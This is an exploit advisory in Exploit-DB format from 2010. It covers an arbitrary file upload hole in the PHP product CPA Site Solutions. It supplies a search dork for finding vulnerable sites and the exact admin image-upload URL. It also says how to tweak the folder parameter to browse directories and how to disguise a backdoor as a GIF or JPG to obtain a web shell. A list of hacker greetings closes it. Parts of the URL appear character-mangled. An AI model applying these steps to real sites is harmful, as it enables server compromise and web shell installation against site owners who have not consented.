CPA Site Solutions - Arbitrary File Upload

EDB-ID:

11365

CVE:

N/A


Platform:

PHP

Published:

2010-02-09

###########################################################################
#                |REMOTE FILE UPLOAD VULNERABILTY|                        #
#                     .:|cpasitesolutions|::.                             #
###########################################################################
AUTHOR	: R3VAN_BASTARD
SITE	: www.sux0r.net
PROVIDER: http://www.cpasitesolutions.com
DORK	: intext:Powered by CPA Site Solutions
###########################################################################
[x] EXPLOIT:
    /admin/editor_files/image.php?in_wp=1&return_function=〈=en-us.php&folder=galleries/sm-icons/&instance_img_dir=&sort_by=name&sort_dir=asc&thumbnails=1

[x] You can find new directory by changing this URL:
    /admin/editor_files/image.php?in_wp=1&return_function=&#12296;=en-us.php&folder="galleries/sm-icons/" <=-change in this section.
    you will find new directory..

[X] NOTE: Edit your backdoor by adding GIF or JPG source, so you can get the shell.
###########################################################################
SALAM HANGAT:

VALENCIA | S3T4N | YOGA0400 | MADONK | KECEMPLUNG KALEN | VRS-HCK | JACK |
YUDIS TIRA | DECLINED | OON_BOY | LUQMAN | ANGKIRANGAN JUMIO+PAIJO | NOGE |
YADOY666 | ALL MAINHACK | SERVER IS DOWN | 
###########################################################################